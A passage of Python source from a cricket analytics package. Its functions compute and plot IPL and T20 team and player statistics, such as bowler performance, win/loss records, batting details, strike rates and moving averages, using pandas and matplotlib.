df7 = df6[['bowler','kind','wickets']]
# Remove rows where runsScored < runsScored as there are too many
df8 = df7[df7['wickets'] >wickets]
df9=df8.groupby(['bowler','kind'])['wickets'].sum().unstack().fillna(0)
# Note: Can also use the below code -*************
#df9=df8.pivot(columns='bowler',index='batsman').fillna(0)
if plot == True:
ax=df9.plot(kind='bar',stacked=False,legend=False,fontsize=8)
plt.legend(loc='center left', bbox_to_anchor=(1.0, 0.5),fontsize=8)
plt.title('Wicker kind by bowlers of ' + main + ' against all T20 teams')
plt.xlabel('Bowler')
plt.ylabel('Total wickets')
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
else:
return(df7)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 1 Feb 2019
# Function: teamBowlersVsBatsmenAllOppnAllMatches
# This function computes and plots the performance of bowlers of an IPL team against all other
# IPL teams
#
###########################################################################################
def teamBowlersVsBatsmenAllOppnAllMatches(matches,main,plot=True,top=5,runsConceded=10,savePic=False, dir1=".",picFile="pic1.png"):
'''
Compute team bowlers vs batsmen all opposition all matches
Description
This function computes performance of bowlers of a team against all opposition in all matches
Usage
teamBowlersVsBatsmenAllOppnAllMatches(matches,,main,plot=True,top=5,runsConceded=10)
Arguments
matches
the data frame of all matches between a team and aall opposition and all obtained with the call getAllMatchesAllOpposition()
main
The team against which the performance is requires
plot
Whether a plot should be displayed or a dataframe to be returned
top
The top number of bowlers in result
runsConded
The number of runs conceded by bowlers
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
dataframe The dataframe with all performances
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
'''
df1=matches.loc[matches.team== main]
df2= df1[['bowler','batsman','runs']]
# Number of wickets taken by bowler
df3=df2.groupby(['bowler','batsman']).sum().reset_index(inplace=False)
df3.columns = ['bowler','batsman','runsConceded']
# Need to pick the 'top' number of bowlers by wickets
df4 = df3.groupby('bowler').sum().reset_index(inplace=False).sort_values('runsConceded',ascending=False)
df4.columns = ['bowler','totalRunsConceded']
df5 = df4.head(top)
df6= pd.merge(df5,df3,on='bowler')
df7 = df6[['bowler','batsman','runsConceded']]
# Remove rows where runsScored < runsScored as there are too many
df8 = df7[df7['runsConceded'] >runsConceded]
df9=df8.groupby(['bowler','batsman'])['runsConceded'].sum().unstack().fillna(0)
# Note: Can also use the below code -*************
#df9=df8.pivot(columns='bowler',index='batsman').fillna(0)
if plot == True:
ax=df9.plot(kind='bar',stacked=False,legend=False,fontsize=8)
plt.legend(loc='center left', bbox_to_anchor=(1.0, 0.5),fontsize=8)
plt.title('Performance of' + main + 'Bowlers vs Batsmen ' )
plt.xlabel('Bowler')
plt.ylabel('Total runs')
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
else:
return(df7)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 1 Feb 2019
# Function: plotWinLossByTeamAllOpposition
# This function computes and plots twins and lossed of IPL team against all other
# IPL teams
#
###########################################################################################
def plotWinLossByTeamAllOpposition(matches, team1, plot='summary',savePic=False, dir1=".",picFile="pic1.png"):
'''
Plot wins for each team
Description
This function computes and plots number of wins for each team in all their encounters.
The plot includes the number of wins byteam1 each team and the matches with no result
Usage
plotWinLossByTeamAllOpposition(matches, main, plot='summary')
Arguments
matches
The dataframe with all matches between 2 IPL teams
main
The 1st team
plot
Summary or detailed
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
'''
a=matches[['date','winner']].groupby(['date','winner']).count().reset_index(inplace=False)
# Plot the overall performance as wins and losses
if plot=="summary":
m= a.loc[a.winner==team1]['winner'].count()
n= a.loc[a.winner!=team1]['winner'].count()
df=pd.DataFrame({'outcome':['win','loss'],'number':[m,n]})
sns.barplot(x='outcome',y='number',data=df)
plt.xlabel('Outcome')
plt.ylabel('Number')
plt.title("Wins vs losses(summary) of " + team1 + ' against all Opposition' )
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
elif plot=="detailed" :
#Plot breakup by team
b=a.groupby('winner').count().reset_index(inplace=False)
# If 'winner' is '0' then the match is a tie.Set as 'tie'
b.loc[b.winner=='0','winner']='Tie'
b.columns = ['winner','number']
ax=sns.barplot(x='winner',y='number',data=b)
plt.xlabel('Winner')
plt.ylabel('Number')
plt.title("Wins vs losses(detailed) of " + team1 + ' against all Opposition' )
ax.set_xticklabels(ax.get_xticklabels(),rotation=60,fontsize=6)
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
else:
print("Unknown option")
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 1 Feb 2019
# Function: plotWinsByRunOrWicketsAllOpposition
# This function computes and plots twins and lossed of IPL team against all other
# IPL teams
#
###########################################################################################
def plotWinsByRunOrWicketsAllOpposition(matches,team1,plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Plot whether the wins for the team was by runs or wickets
Description
This function computes and plots number the number of wins by runs vs number of wins
by wickets against all Opposition
Usage
plotWinsByRunOrWicketsAllOpposition(matches,team1)
Arguments
matches
The dataframe with all matches between an IPL team and all IPL teams
team1
The team for which the plot has to be done
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
'''
# Get the number of matches won
df= matches.loc[matches.winner == team1]
a=df[['date','winType']].groupby(['date','winType']).count().reset_index(inplace=False)
b=a.groupby('winType').count().reset_index(inplace=False)
b.columns = ['winType','number']
sns.barplot(x='winType',y='number',data=b)
plt.xlabel('Win Type - Runs or wickets')
plt.ylabel('Number')
plt.title("Win type for team -" + team1 + ' against all opposition' )
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 1 Feb 2019
# Function: plotWinsbyTossDecisionAllOpposition
# This function computes and plots the win type of IPL team against all
# IPL teams
#
###########################################################################################
def plotWinsbyTossDecisionAllOpposition(matches,team1,tossDecision='bat',plot="summary", savePic=False, dir1=".",picFile="pic1.png"):
'''
Plot whether the wins for the team was by runs or wickets
Description
This function computes and plots number the number of wins by runs vs number of wins
by wickets
Usage
plotWinsbyTossDecisionAllOpposition(matches,team1,tossDecision='bat',plot="summary")
Arguments
matches
The dataframe with all matches between 2 IPL teams
team1
The team for which the plot has to be done
plot
'summary' or 'detailed'
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
teamBowlingScorecardOppnAllMatches
teamBatsmenPartnershipOppnAllMatchesChart
teamBowlingWicketKindOppositionAllMatches
'''
df=matches.loc[(matches.tossDecision==tossDecision) & (matches.tossWinner==team1)]
a=df[['date','winner']].groupby(['date','winner']).count().reset_index(inplace=False)
if plot=="summary":
m= a.loc[a.winner==team1]['winner'].count()
n= a.loc[a.winner!=team1]['winner'].count()
df=pd.DataFrame({'outcome':['win','loss'],'number':[m,n]})
sns.barplot(x='outcome',y='number',data=df)
plt.xlabel('Outcome')
plt.ylabel('Number')
plt.title("Wins vs losses(summary) against all opposition when toss decision was to " + tossDecision + ' for ' + team1 )
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
elif plot=="detailed" :
#Plot breakup by team
b=a.groupby('winner').count().reset_index(inplace=False)
# If 'winner' is '0' then the match is a tie.Set as 'tie'
b.loc[b.winner=='0','winner']='Tie'
b.columns = ['winner','number']
ax=sns.barplot(x='winner',y='number',data=b)
plt.xlabel(team1 + ' chose to ' + tossDecision)
plt.ylabel('Number')
plt.title('Wins vs losses(detailed) against all opposition for ' + team1 + ' when toss decision was to ' + tossDecision )
ax.set_xticklabels(ax.get_xticklabels(),rotation=60, fontsize=6)
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: Details
# This function computes the batting details of a team
# IPL teams
#
###########################################################################################
def getTeamBattingDetails(team,dir=".",save=False,odir="."):
'''
Description
This function gets the batting details of a team in all matchs against all oppositions. This gets all the details of the batsmen balls faced,4s,6s,strikerate, runs, venue etc. This function is then used for analyses of batsmen. This function calls teamBattingPerfDetails()
Usage
getTeamBattingDetails(team,dir=".",save=FALSE)
Arguments
team
The team for which batting details is required
dir
The source directory of RData files obtained with convertAllYaml2RDataframes()
save
Whether the data frame needs to be saved as RData or not. It is recommended to set save=TRUE as the data can be used for a lot of analyses of batsmen
Value
battingDetails The dataframe with the batting details
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
Examples
m=getTeamBattingDetails(team1,dir1,save=True)
'''
# Get all matches played by team
t1 = '*' + team +'*.csv'
path= os.path.join(dir,t1)
files = glob.glob(path)
# Create an empty dataframe
details = pd.DataFrame()
# Loop through all matches played by team
for file in files:
match=pd.read_csv(file)
scorecard,extras=teamBattingScorecardMatch(match,team)
if scorecard.empty:
continue
# Filter out only the rows played by team
match1 = match.loc[match.team==team]
# Check if there were wickets, you will 'bowled', 'caught' etc
if len(match1 !=0):
if isinstance(match1.kind.iloc[0],str):
b=match1.loc[match1.kind != '0']
# Get the details of the wicket
wkts= b[['batsman','bowler','fielders','kind','player_out']]
#date','team2','winner','result','venue']]
df=pd.merge(scorecard,wkts,how='outer',on='batsman')
# Fill NA as not outs
df =df.fillna('notOut')
# Set other info
if len(b) != 0:
df['date']= b['date'].iloc[0]
df['team2']= b['team2'].iloc[0]
df['winner']= b['winner'].iloc[0]
df['result']= b['result'].iloc[0]
df['venue']= b['venue'].iloc[0]
details= pd.concat([details,df])
details = details.sort_values(['batsman','date'])
if save==True:
fileName = "./" + team + "-BattingDetails.csv"
output=os.path.join(odir,fileName)
details.to_csv(output)
return(details)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: getBatsmanDetails
# This function gets the batsman details
# IPL teams
#
###########################################################################################
def getBatsmanDetails(team, name,dir="."):
'''
Get batting details of batsman from match
Description
This function gets the batting details of a batsman given the match data as a RData file
Usage
getBatsmanDetails(team,name,dir=".")
Arguments
team
The team of the batsman e.g. India
name
Name of batsman
dir
The directory where the source file exists
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
batsmanRunsPredict
batsmanMovingAverage
bowlerWicketsVenue
bowlerMeanRunsConceded
Examples
## Not run:
name="SK Raina"
team='Chennai Super Kings'
#df=getBatsmanDetails(team, name,dir=".")
'''
path = dir + '/' + team + "-BattingDetails.csv"
battingDetails= pd.read_csv(path)
batsmanDetails = battingDetails.loc[battingDetails['batsman'].str.contains(name)]
return(batsmanDetails)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: getBatsmanDetails
# This function plots runs vs deliveries for the batsman
#
###########################################################################################
def batsmanRunsVsDeliveries(df,name= "A Late Cut",plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Runs versus deliveries faced
Description
This function plots the runs scored and the deliveries required. A regression smoothing function is used to fit the points
Usage
batsmanRunsVsDeliveries(df, name= "A Late Cut")
Arguments
df
Data frame
name
Name of batsman
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
batsmanFoursSixes
batsmanRunsVsDeliveries
batsmanRunsVsStrikeRate
Examples
name="SK Raina"
team='Chennai Super Kings'
df=getBatsmanDetails(team, name,dir=".")
batsmanRunsVsDeliveries(df, name)
'''
rcParams['figure.figsize'] = 8, 5
plt.scatter(df.balls,df.runs)
sns.lmplot(x='balls',y='runs', data=df)
plt.xlabel("Balls faced",fontsize=8)
plt.ylabel('Runs',fontsize=8)
atitle=name + "- Runs vs balls faced"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: batsmanFoursSixes
# This function gets the batsman fours and sixes for batsman
#
#
###########################################################################################
def batsmanFoursSixes(df,name= "A Leg Glance", plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function computes and plots the total runs, fours and sixes of the batsman
Usage
batsmanFoursSixes(df,name= "A Leg Glance")
Arguments
df
Data frame
name
Name of batsman
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
batsmanDismissals batsmanRunsVsDeliveries batsmanRunsVsStrikeRate batsmanRunsVsStrikeRate batsmanRunsPredict
Examples
name="SK Raina"
team='Chennai Super Kings'
df=getBatsmanDetails(team, name,dir=".")
batsmanFoursSixes(df,"SK Raina")
'''
# Compute runs from fours and sixes
rcParams['figure.figsize'] = 8, 5
df['RunsFromFours']=df['4s']*4
df['RunsFromSixes']=df['6s']*6
df1 = df[['balls','runs','RunsFromFours','RunsFromSixes']]
# Total runs
sns.scatterplot('balls','runs',data=df1)
# Fit a linear regression line
balls=df1.balls.reshape(-1,1)
linreg = LinearRegression().fit(balls, df1.runs)
x=np.linspace(0,120,10)
#Plot regression line balls vs runs
plt.plot(x, linreg.coef_ * x + linreg.intercept_, color='blue',label="Total runs")
# Runs from fours
sns.scatterplot('balls','RunsFromFours',data=df1)
#Plot regression line balls vs Runs from fours
linreg = LinearRegression().fit(balls, df1.RunsFromFours)
plt.plot(x, linreg.coef_ * x + linreg.intercept_, color='red',label="Runs from fours")
# Runs from sixes
sns.scatterplot('balls','RunsFromSixes',data=df1)
#Plot regression line balls vs Runs from sixes
linreg = LinearRegression().fit(balls, df1.RunsFromSixes)
plt.plot(x, linreg.coef_ * x + linreg.intercept_, color='green',label="Runs from sixes")
plt.xlabel("Balls faced",fontsize=8)
plt.ylabel('Runs',fontsize=8)
atitle=name + "- Total runs, fours and sixes"
plt.title(atitle,fontsize=8)
plt.legend(loc="upper left")
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: batsmanDismissals
# This function plots the batsman dismissals
#
###########################################################################################
def batsmanDismissals(df,name="A Leg Glance",plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function computes and plots the type of dismissals of the the batsman
Usage
batsmanDismissals(df,name="A Leg Glance")
Arguments
df
Data frame
name
Name of batsman
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
batsmanFoursSixes
batsmanRunsVsDeliveries
batsmanRunsVsStrikeRate
Examples
name="SK Raina"
team='Chennai Super Kings'
df=getBatsmanDetails(team, name,dir=".")
batsmanDismissals(df,"SK Raina")
'''
# Count dismissals
rcParams['figure.figsize'] = 8, 5
df1 = df[['batsman','kind']]
df2 = df1.groupby('kind').count().reset_index(inplace=False)
df2.columns = ['dismissals','count']
plt.pie(df2['count'], labels=df2['dismissals'],autopct='%.1f%%')
atitle= name + "-Dismissals"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: batsmanRunsVsStrikeRate
# This function plots the runs vs strike rate
#
#
###########################################################################################
def batsmanRunsVsStrikeRate (df,name= "A Late Cut", plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function plots the runs scored by the batsman and the runs scored by the batsman. A loess line is fitted over the points
Usage
batsmanRunsVsStrikeRate(df, name= "A Late Cut")
Arguments
df
Data frame
name
Name of batsman
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
https://github.com/tvganesh/yorkrData
See Also
batsmanDismissals
batsmanRunsVsDeliveries
batsmanRunsVsStrikeRate
teamBatsmenPartnershipAllOppnAllMatches
Examples
name="SK Raina"
team='Chennai Super Kings'
df=getBatsmanDetails(team, name,dir=".")
batsmanRunsVsStrikeRate(df,"SK Raina")
'''
rcParams['figure.figsize'] = 8, 5
plt.scatter(df.runs,df.SR)
sns.lmplot(x='runs',y='SR', data=df,order=2)
plt.xlabel("Runs",fontsize=8)
plt.ylabel('Strike Rate',fontsize=8)
atitle=name + "- Runs vs Strike rate"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: movingaverage
# This computes the moving average
#
#
###########################################################################################
def movingaverage(interval, window_size):
window= np.ones(int(window_size))/float(window_size)
return np.convolve(interval, window, 'same')
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: batsmanMovingAverage
# This function plots the moving average of runs
#
#
###########################################################################################
def batsmanMovingAverage(df, name, plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function plots the runs scored by the batsman over the career as a time series. A loess regression line is plotted on the moving average of the batsman the batsman
Usage
batsmanMovingAverage(df, name= "A Leg Glance")
Arguments
df
Data frame
name
Name of batsman
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
batsmanDismissals
batsmanRunsVsDeliveries
batsmanRunsVsStrikeRate
teamBatsmenPartnershipAllOppnAllMatches
Examples
name="SK Raina"
team='Chennai Super Kings'
df=getBatsmanDetails(team, name,dir=".")
batsmanMovingAverage(df,"SK Raina")
'''
rcParams['figure.figsize'] = 8, 5
y_av = movingaverage(df.runs, 10)
date= pd.to_datetime(df['date'])
plt.plot(date, y_av,"b")
plt.xlabel('Date',fontsize=8)
plt.ylabel('Runs',fontsize=8)
plt.xticks(rotation=90)
atitle = name + "-Moving average of runs"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: batsmanCumulativeAverageRuns
# This functionplots the cumulative average runs
#
#
###########################################################################################
def batsmanCumulativeAverageRuns(df,name="A Leg Glance",plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Batsman's cumulative average runs
Description
This function computes and plots the cumulative average runs of a batsman
Usage
batsmanCumulativeAverageRuns(df,name= "A Leg Glance")
Arguments
df
Data frame
name
Name of batsman
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
batsmanCumulativeStrikeRate bowlerCumulativeAvgEconRate bowlerCumulativeAvgWickets batsmanRunsVsStrikeRate batsmanRunsPredict
Examples
name="SK Raina"
team='Chennai Super Kings'
df=getBatsmanDetails(team, name,dir=".")
batsmanCumulativeAverageRuns(df,"SK Raina")
'''
rcParams['figure.figsize'] = 8, 5
cumAvgRuns = df['runs'].cumsum()/pd.Series(np.arange(1, len( df['runs'])+1), df['runs'].index)
plt.plot(cumAvgRuns)
plt.xlabel('No of matches',fontsize=8)
plt.ylabel('Cumulative Average Runs',fontsize=8)
plt.xticks(rotation=90)
atitle = name + "-Cumulative Average Runs vs matches"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: batsmanCumulativeStrikeRate
# This function plots the cumulative average Strike rate
#
#
###########################################################################################
def batsmanCumulativeStrikeRate(df,name="A Leg Glance",plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function computes and plots the cumulative average strike rate of a batsman
Usage
batsmanCumulativeStrikeRate(df,name= "A Leg Glance")
Arguments
df
Data frame
name
Name of batsman
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
https://github.com/tvganesh/yorkrData
See Also
batsmanCumulativeAverageRuns bowlerCumulativeAvgEconRate bowlerCumulativeAvgWickets batsmanRunsVsStrikeRate batsmanRunsPredict
Examples
name="SK Raina"
team='Chennai Super Kings'
df=getBatsmanDetails(team, name,dir=".")
#batsmanCumulativeAverageRunsdf(df,name)
'''
rcParams['figure.figsize'] = 8, 5
cumAvgRuns = df['SR'].cumsum()/pd.Series(np.arange(1, len( df['SR'])+1), df['SR'].index)
plt.plot(cumAvgRuns)
plt.xlabel('No of matches',fontsize=8)
plt.ylabel('Cumulative Average Strike Rate',fontsize=8)
plt.xticks(rotation=70)
atitle = name + "-Cumulative Average Strike Rate vs matches"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: batsmanRunsAgainstOpposition
# This function plots the batsman's runs against opposition
#
#
###########################################################################################
def batsmanRunsAgainstOpposition(df,name= "A Leg Glance",plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function computes and plots the mean runs scored by the batsman against different oppositions
Usage
batsmanRunsAgainstOpposition(df, name= "A Leg Glance")
Arguments
df
Data frame
name
Name of batsman
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
https://github.com/tvganesh/yorkrData
See Also
batsmanFoursSixes
batsmanRunsVsDeliveries
batsmanRunsVsStrikeRate
teamBatsmenPartnershipAllOppnAllMatches
Examples
name="SK Raina"
team='Chennai Super Kings'
df=getBatsmanDetails(team, name,dir=".")
batsmanRunsAgainstOpposition(df,name)
'''
rcParams['figure.figsize'] = 8, 5
df1 = df[['batsman', 'runs','team2']]
df2=df1.groupby('team2').agg(['sum','mean','count'])
df2.columns= ['_'.join(col).strip() for col in df2.columns.values]
# Reset index
df3=df2.reset_index(inplace=False)
ax=sns.barplot(x='team2', y="runs_mean", data=df3)
plt.xticks(rotation="vertical",fontsize=8)
plt.xlabel('Opposition',fontsize=8)
plt.ylabel('Mean Runs',fontsize=8)
atitle=name + "-Mean Runs against opposition"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: batsmanRunsVenue
# This function plos the batsman's runs at venues
#
#
###########################################################################################
def batsmanRunsVenue(df,name= "A Leg Glance",plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function computes and plots the mean runs scored by the batsman at different venues of the world
Usage
batsmanRunsVenue(df, name= "A Leg Glance")
Arguments
df
Data frame
name
Name of batsman
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
https://github.com/tvganesh/yorkrData
See Also
batsmanFoursSixes
batsmanRunsVsDeliveries
batsmanRunsVsStrikeRate
teamBatsmenPartnershipAllOppnAllMatches
batsmanRunsAgainstOpposition
Examples
name="SK Raina"
team='Chennai Super Kings'
df=getBatsmanDetails(team, name,dir=".")
#batsmanRunsVenue(df,name)
'''
rcParams['figure.figsize'] = 8, 5
df1 = df[['batsman', 'runs','venue']]
df2=df1.groupby('venue').agg(['sum','mean','count'])
df2.columns= ['_'.join(col).strip() for col in df2.columns.values]
# Reset index
df3=df2.reset_index(inplace=False)
ax=sns.barplot(x='venue', y="runs_mean", data=df3)
plt.xticks(rotation="vertical",fontsize=8)
plt.xlabel('Venue',fontsize=8)
plt.ylabel('Mean Runs',fontsize=8)
atitle=name + "-Mean Runs at venues"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: teamBowlingPerDetails
# This function gets the bowling performances
#
#
###########################################################################################
def teamBowlingPerDetails(team):
# Compute overs bowled
a1= getOvers(team).reset_index(inplace=False)
# Compute runs conceded
b1= getRunsConceded(team).reset_index(inplace=False)
# Compute maidens
c1= getMaidens(team).reset_index(inplace=False)
# Compute wickets
d1= getWickets(team).reset_index(inplace=False)
e1=pd.merge(a1, b1, how='outer', on='bowler')
f1= pd.merge(e1,c1,how='outer', on='bowler')
g1= pd.merge(f1,d1,how='outer', on='bowler')
g1 = g1.fillna(0)
# Compute economy rate
g1['econrate'] = g1['runs']/g1['overs']
g1.columns=['bowler','overs','runs','maidens','wicket','econrate']
g1.maidens = g1.maidens.astype(int)
g1.wicket = g1.wicket.astype(int)
return(g1)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: getTeamBowlingDetails
# This function gets the team bowling details
#
#
###########################################################################################
def getTeamBowlingDetails (team,dir=".",save=False,odir="."):
'''
Description
This function gets the bowling details of a team in all matchs against all oppositions. This gets all the details of the bowlers for e.g deliveries, maidens, runs, wickets, venue, date, winner ec
Usage
getTeamBowlingDetails(team,dir=".",save=FALSE)
Arguments
team
The team for which detailed bowling info is required
dir
The source directory of RData files obtained with convertAllYaml2RDataframes()
save
Whether the data frame needs to be saved as RData or not. It is recommended to set save=TRUE as the data can be used for a lot of analyses of batsmen
Value
bowlingDetails The dataframe with the bowling details
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
https://github.com/tvganesh/yorkrData
See Also
getBatsmanDetails
getBowlerWicketDetails
batsmanDismissals
getTeamBattingDetails
Examples
dir1= "C:\\software\\cricket-package\\yorkpyIPLData\\data"
eam1='Delhi Daredevils'
m=getTeamBowlingDetails(team1,dir1,save=True)
'''
# Get all matches played by team
t1 = '*' + team +'*.csv'
path= os.path.join(dir,t1)
files = glob.glob(path)
# Create an empty dataframe
details = pd.DataFrame()
# Loop through all matches played by team
for file in files:
match=pd.read_csv(file)
if(match.size != 0):
team1=match.loc[match.team != team]
else:
continue
if len(team1) !=0:
scorecard=teamBowlingPerDetails(team1)
scorecard['date']= match['date'].iloc[0]
scorecard['team2']= match['team2'].iloc[0]
scorecard['winner']= match['winner'].iloc[0]
scorecard['result']= match['result'].iloc[0]
scorecard['venue']= match['venue'].iloc[0]
details= pd.concat([details,scorecard])
details = details.sort_values(['bowler','date'])
else:
pass # The team did not bowl
if save==True:
fileName = "./" + team + "-BowlingDetails.csv"
output=os.path.join(odir,fileName)
details.to_csv(output,index=False)
return(details)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
